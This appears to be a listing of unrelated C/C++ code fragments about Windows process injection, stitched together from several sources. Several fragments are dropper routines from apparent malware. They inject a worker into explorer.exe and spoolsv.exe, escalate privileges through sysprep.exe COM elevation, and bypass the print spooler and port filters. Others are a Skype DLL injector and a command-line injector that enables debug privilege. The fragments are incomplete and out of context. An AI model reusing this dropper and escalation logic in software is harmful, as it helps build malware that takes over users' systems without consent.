BOOL DropperDllWork(HMODULE hDll,LPCSTR lpExePath) { BOOL bRet = FALSE; LPTHREAD_START_ROUTINE ThreadRoutine = NULL; LPCSTR lpExeName = PathFindFileName(lpExePath); if (!_stricmp(MAIN_WORK_PROCESS,lpExeName)) { ThreadRoutine = MainWorkThread; } else if (!_stricmp("explorer.exe",lpExeName)) { // explorer ThreadRoutine = ExplorerWorkThread; } else if (!_stricmp("spoolsv.exe",lpExeName)) { // inject worker process in other session if (!InjectProcess(MAIN_WORK_PROCESS,g_pvImageBase,g_dwImageSize,FALSE)) { // add ref dll LoadLibrary(g_chDllPath); // if failed work from spooler ThreadRoutine = MainWorkThread; } } else if (!_stricmp("sysprep.exe",lpExeName)) { // com elevation // inject worker process in other session InjectProcess(MAIN_WORK_PROCESS,g_pvImageBase,g_dwImageSize,FALSE); ExitProcess(ERROR_SUCCESS); } if (ThreadRoutine) { HANDLE hThread = CreateThread(NULL,0,ThreadRoutine,NULL,0,NULL); if (hThread) { bRet = TRUE; CloseHandle(hThread); } } return bRet; }
void InjectSkype() { PROCESSENTRY32 entry; entry.dwSize = sizeof(PROCESSENTRY32); bool injected = false; HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); if (Process32First(snapshot, &entry) == TRUE) { while (Process32Next(snapshot, &entry) == TRUE) { if (_wcsicmp(entry.szExeFile, _T("skype.exe")) == 0) { if (!InjectProcess(entry.th32ProcessID)) { MessageBox(NULL, _T("Не удалось внедрить SkypeNoBingHook.dll в процесс Skype"), _T("SkypeNoBing"), MB_OK | MB_ICONEXCLAMATION); return; }; injected = true; } } } if (!injected) { MessageBox(NULL, _T("Процесс Skype.exe не найден"), _T("SkypeNoBing"), MB_OK | MB_ICONEXCLAMATION); }; CloseHandle(snapshot); }
BOOL DropperExeUser() { BOOL Ret = FALSE; // inject explorer process in current session Ret = InjectProcess("explorer.exe",g_pvImageBase,g_dwImageSize,TRUE); return Ret; }
BOOLEAN Inject::InjectProcessByName(LPSTR ProcessName) { DWORD Processes[10]; DWORD Count = Utils::GetProcessIdByName(ProcessName, Processes, RTL_NUMBER_OF(Processes)); for (DWORD i = 0; i < Count; i++) { if (InjectProcess(Processes[i], 0)) { DbgMsg(__FUNCTION__"(): Inject to '%S' ok\r\n", ProcessName); return TRUE; } } return FALSE; }
BOOL DropperExeAdmin() { BOOL bOk = FALSE; // setup rpc control port redirection PortFilterBypassHook(); bOk = SpoolerBypass(g_chDllPath); if (!bOk) { // inject worker process in current session bOk = InjectProcess(MAIN_WORK_PROCESS,g_pvImageBase,g_dwImageSize,TRUE); } return bOk; }
int _tmain(int argc, _TCHAR* argv[]) { if (3 == argc) { _tprintf(_T("%s %s\n"), argv[1], argv[2]); EnableDebugPrivilege(); if (InjectProcess(argv[1], _wtoi(argv[2]))) { _tprintf(_T("inject sucessed!\n")); NotifyGdiChecker(); return 1; } else { DWORD dwError = GetLastError(); _tprintf(_T("inject failed %d!"), dwError); } } else { printf("command line error,please input like this:\n\"dll path\" pid\n"); } return 0; }